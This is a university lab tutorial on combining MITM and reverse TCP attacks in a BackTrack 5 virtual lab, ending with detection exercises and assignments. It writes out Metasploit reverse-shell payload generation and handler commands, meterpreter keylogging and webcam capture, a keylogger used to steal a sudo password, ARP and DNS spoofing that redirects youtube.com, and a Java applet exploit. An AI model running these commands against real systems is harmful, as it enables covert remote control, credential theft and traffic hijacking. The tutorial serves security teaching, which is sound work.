MITM and reverse TCP attacks

Mikhail Zolotukhin and Timo Hamalainen

Department of Mathematical Information Technology, University of Jyv askyl a
1 Introduction
Man-In-The-Middle attacks can be combined with such dangerous attacks as reverse TCP connection. A
rewall usually blocks open ports, but does not block outgoing trac, therefore a reverse connection is used
to bypass rewall and router security restrictions. For example, a Trojan horse running on a computer behind
a rewall that blocks incoming connections can easily open an outbound connection to a remote host on
the Internet. Once the connection is established, the remote host can send commands to the Trojan horse.
Trojan horses that use a reverse connection usually send SYN (TCP) packets to the attackers IP address.
The attacker listens for these SYN packets and accepts the desired connections.
In this tutorial, it is shown how to establish reverse TCP connection between a client and the attacker
with the latest BackTrack 5 installed on it. How to congure an attacker virtual machine with BackTrack 5 is
shown in the previous tutorial. The remainder of this tutorial is organized as follows. Several preliminary tasks
are presented in Section 2. Reverse connection attack to hack Windows 7 and Ubuntu 12.04 are described
in Section 3 and Section 4 respectively. In Section 5, it is shown how an MITM attack can help an attacker
to establish the reverse TCP connection. Security issues related to reverse connection attacks are presented
in Section 6. Some simple assignments are listed in Section 7. Section 8 concludes the tutorial.
2 Preliminary questions
What is metasploit? What is it used for?
Explain shortly the reverse TCP attack?
How can the attacker execute a simple exploit on the victim machine?
Check the article http://www.netresec.com/?page=Blog&month=2011-07&post=How-to-detect-reverse https-
backdoors. What simple indicators can be used to detect Metasploits reverse https meterpreter sessions?
3 Reverse connection attack for Windows 7
1. Run following machines: gateway, dnsdhcp, the client with Windows 7 (if you have it) and the attacker
with BackTrack 5.
2. On the attacker open terminal and check your IP address with the help of ipcong command. In my
case it is 192.168.1.102.
3. Then run the following command to create Windows executable le with name ExecuteMe.exe which
will be saved on the attackers desktop:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.102 X >
Desktop/Executive.exe
where 192.168.1.102 is the attacker IP address.
4. Copy this .exe le to the Windows 7 client. For this purpose you can use VirtualBox shared folders
http://www.virtualbox.org/manual/ch04.html#sharedfolders, a USB device
http://www.dedoimedo.com/computers/virtualbox-usb.html, or send it to the client with an email. After
you got this le on the Windows 7, copy it to the desktop.
2 Mikhail Zolotukhin and Timo H amalainen
5. Go back to the attacker and create a handler to handle the connection that comes to the attacker from
the exploit we have just created. For this purpose, in the terminal open Metasploit console
msfconsole
wait until meterpreter console is opened (you will see something like msf >) and type the following
commands in this console:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.102
exploit
where 192.168.1.102 is the attacker IP address. Wait until the payload handler is started.
6. Now execute the exploit we have already copied to the client (Executive.exe) and see if the handler on
the attacker receives something or not. In case of success you will see the message that new meterpreter
session opened and meterpreter will automatically go to this session. If not, you can go to the started
session by listing all opened sessions by typing follows in the msfconsole of the attacker:
sessions -l
then nd the number of the session just created (in my case it is 1) and to interact with this session type
sessions -i 1
where 1 is the id of new session.
7. Now the attacker is inside the client and can use following commands:
pwd, cd, ls - to navigate
search - to search les on the client machine
upload - to upload les to the client
download - to download les from the client
screenshot - to make the screenshot of the clients desktop
webcam snap - to make a picture from the clients web camera
keyscan start - to start scanning what keys are pressed on the clients keyboard
keyscan stop - to stop key scanning
keyscan dump - to dump keys while running
Try some of these commands.
4 Reverse connection attack for Ubuntu 12.04
1. Run following machines: gateway, dnsdhcp, the client with Ubuntu 12.04 and the attacker with BackTrack
5.
2. Check what is the attacker IP address with the help of ifcong command. In my case it is 192.168.1.102.
3. Then run the following command to create executable le with name Executive:
msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.102
LPORT=8888 X >> Executive
where 192.168.1.102 is the attacker IP address and 8888 is any available port. Make this le exe-
cutable:
chmod u=rwx Executive
4. Copy this le to the Ubuntu client and put it on the desktop. Make it executable.
MITM and reverse TCP attacks 3
cd Desktop
chmod u=rwx Executive
5. Go back to the attacker and create a handler to handle the connection that comes to the attacker from
the exploit we have just created.
msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp
LHOST=192.168.1.102 LPORT=8888 E
where 192.168.1.102 is the attacker IP address and 8888 is the port you used when created Executive.
Wait until the payload handler is started.
6. Double click the Executive binary on the client. Nothing happens, but we get a reverse shell on our
listener interface. In case of success you will see the message that new meterpreter session opened and
meterpreter will automatically go to this session. If not, you can go to the started session by listing all
opened sessions by typing follows in the msfconsole of the attacker:
sessions -l
then nd the number of the session just created (in my case it is 1) and to interact with this session type
sessions -i 1
where 1 is the id of new session.
7. From the attacker machine download the special script from
http://users.jyu./ mizolotu/download.php?le=les/keylog.sh and put it to the same directory from
where you started the reverse connection handler. This script is self explanatory: it gets the xinput ID
for the keyboard and dumps the xmodmap and keystrokes to the /tmp/.xkey.log le.
8. Upload keylog.sh to the client by typing in the meterpreter console:
upload keylog.sh
make it executable
shell
chmod u=rwx keylog.sh
and run the script.
./keylog.sh
When it asks for KBD ID enter the id of the keyboard from the list (in my case it is on the last position
in the list, called Dell USB Entry Keyboard and has ID 9) and press Enter. Terminate the shell session
as the keylogger is running in the background.
9. On the client machine open terminal and run any command which requires superuser priveleges, e.g.
sudo su and enter your password (if you use the VM downloaded from the course web page, it most
likely is client).
10. On the attacker download the .xkey.log from the /tmp folder by running in the meterpreter console:
cd /tmp
download .xkey.log
11. Download the keylog decoder from
http://users.jyu./ mizolotu/download.php?le=les/keylog reader.sh and put it to the same directory
where .xkey.log is now located on the attacker machine. Run this script and you will gure out the sudo
password.
12. On the meterpreter console type
4 Mikhail Zolotukhin and Timo H amalainen
shell
and try to get sudo priveleges:
sudo su
You cannot do it and get the error: 3 incorrect password attempts.
13. To bypass this problem, type
python -c import pty;pty.spawn("/bin/bash")
and enter sudo password. To make sure that you have sudo priveleges type
whoami
and
id
5 Combination of MITM and reverse connection attacks
As you can notice in previous sections we ran an executable le on the client machine to create reverse
connection to the attacker. However, in the real world, a user will not run untrusted executable les on his
own computer. Man-in-the-middle attacks can be used to redirect user to the attacker web site and then
perform the reverse connection attack. You can use python scripts for ARP poisoning and DNS spoong as
described in the DNS spoong tutorial, but here we simply use software already available on BackTrack 5.
1. Run following machines: gateway, dnsdhcp, the client with Windows 7 and the attacker with BackTrack
5.
2. On the attacker machine open terminal and start ARP poisoning:
arpspoof -i eth0 -t 192.168.1.101 192.168.1.2
where
eth0 is the attackers network interface
192.168.1.101 is the clients IP
192.168.1.2 is the DNS server IP.
3. Create simple .txt le, put the line
192.168.1.102 www.youtube.com
into it and save as dns.txt. Here 192.168.1.102 is the attacker IP address and www.youtube.com is
the web site name which will be redirected to the attacker.
4. Open another terminal and start DNS spoong:
dnsspoof -i eth0 -f dns.txt
where
eth0 is the attackers network interface
dns.txt is the name of the le just created.
5. Enable IP forwarding on the attacker:
sysctl -w net.ipv4.ip_forward=1
6. Open new terminal and run reverse TCP attack as follows:
MITM and reverse TCP attacks 5
msfcli exploit/multi/browser/java_signed_applet
PAYLOAD=windows/meterpreter/reverse_tcp
LHOST=192.168.1.102 LPORT=8888 SRVHOST=192.168.1.102
SRVPORT=80 URIPATH=/ E
where
192.168.1.102 is the attackers IP address
8888 is the port being listened by the handler
80 is standard port used by HTTP.
As you can see, this command uses Java applet exploit and creates a TCP connection handler on the
attacker. If somebody goes to 192.168.1.102 in the Internet browser and executes the applet there, the
TCP connection to the attacker will be established. If there is an error saying that port 80 is already in
use, stop the Apache server: Applications > BackTrack > Services > HTTPD > apache stop.
7. In order to test this attack on the client, download and install Java on it:
http://www.java.com/en/download/help/windows manual download.xml. Now navigate to www.youtube.com
on the clients browser. For the sake of demonstration answer Allow/Yes/Accept in all warning dialogues.
In case of success, on the attacker machine new meterpreter session will start.
6 Security issues
One easy way to detect reverse TCP connection attack is using netstat command.
1. Perform the reverse TCP attack on Ubuntu 12.04 client as described in the 4-th section.
2. Netstat shows all network connections of the client. Type in the terminal
netstat --tcp
to see all TCP connections. Type
netstat --tcp --numeric
to show IP addresses instead of domain names. Finally, run
netstat --tcp --numeric --programs
to see what programs use those TCP connections.
3. If the Internet connection is closed down and an application still tries to connect to remote hosts it may
be infected with malware. Taking this into account, disable networking on the client:
sudo ifconfig eth0 down
Wait for a while and run periodically netstat --tcp --numeric --programs or netstat -tnp. If
after some time a connection remains ESTABLISHED, you can mark it as suspicious. In my case, after
few minutes I had only one connection and it was related to the malicious le Executive.
4. Find the program Executive in the list made by netstat -tnp and check what PID it has. To nd les
related to this application use
lsof -p PID
and stop it with
kill -9 PID
Another option is to use special software for intrusion and malware detection. For example, in Ubuntu you
can try to install and run Root Hunter, chkrootkit, Clam AntiVirus, Avast, Tiger, etc.
6 Mikhail Zolotukhin and Timo H amalainen
1. Perform the reverse TCP attack on Ubuntu 12.04 client as described in the 4-th section. Upload to the
client keylogger, make it executable and run it.
2. On the client install chkrootkit:
sudo apt-get install chkrootkit
3. Run chkrootkit as follows:
sudo chkrootkit
After the scan is completed, you can notice that it can not nd the tty (controlling terminal) of the
processes related to xinput used in the attackers keylogger, which may look suspicious, especially if you
know that did not run xinput.
7 Assignment
1. Answer preliminary questions and shortly explain the results obtained in the tutorial.
2. Add to the report results obtained with Netstat.
3. Add to the report the results obtained with Chkrootkit.
4. Write general comments about the tutorial: what was interesting, dicult, etc.
Write a report (in English) where include answers for assignments above and send it to mizolotu@jyu..
8 Conclusion
In this tutorial, it has been shown how to perform the reverse TCP attack and how the MITM approach
can help the attacker to do it. Finally, some simple techniques to detect this attack have been considered.